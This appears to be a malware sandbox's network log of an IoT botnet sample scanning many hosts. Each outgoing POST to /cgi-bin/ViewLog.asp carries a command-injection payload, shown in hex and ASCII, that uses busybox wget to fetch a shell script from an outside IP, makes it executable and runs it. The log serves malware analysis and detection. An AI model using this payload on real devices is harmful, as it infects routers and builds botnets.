                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:10.067715883 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        444192.168.2.233478231.136.46.2238080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:08.035830021 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:09.020032883 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:10.971817017 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:15.035343885 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:22.970092058 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:38.583956957 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:10.067610025 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        445192.168.2.235630485.237.173.1758080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:08.055332899 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        446192.168.2.235411094.120.248.1448080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:08.065654039 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        447192.168.2.234203095.86.85.1838080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:08.074204922 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        448192.168.2.234960631.132.1.1538080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:08.310048103 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:08.599661112 CEST1289INHTTP/1.1 400 Bad Request
                                                        Server: squid/3.5.20
                                                        Mime-Version: 1.0
                                                        Date: Sun, 14 Apr 2024 14:36:08 GMT
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 3454
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Connection: close
                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 73 71 75 69 64 2d 69 6e 74 65 72 6e 61 6c 2d 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d
                                                        Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('/squid-internal-static/icons/SN.png') no-


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        449192.168.2.235492831.220.93.978080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:08.338108063 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:08.643989086 CEST304INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:08 GMT
                                                        Server: Apache
                                                        Content-Length: 126
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                                        Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        450192.168.2.234588694.123.250.548080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:08.395189047 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        451192.168.2.234191094.253.98.308080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:08.395353079 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:08.735639095 CEST324INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.14.0
                                                        Date: Sun, 14 Apr 2024 14:36:08 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 169
                                                        Connection: keep-alive
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        452192.168.2.235668094.123.104.1668080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:08.406054974 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        453192.168.2.235774494.131.62.1918080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:09.540910959 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:09.759577990 CEST1260INHTTP/1.1 400 Bad Request
                                                        Server: squid/6.0.0-20220501-re899e0c27
                                                        Mime-Version: 1.0
                                                        Date: Sun, 14 Apr 2024 14:36:09 GMT
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 3572
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Vary: Accept-Language
                                                        Content-Language: en
                                                        Cache-Status: ezproxies.com
                                                        Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73
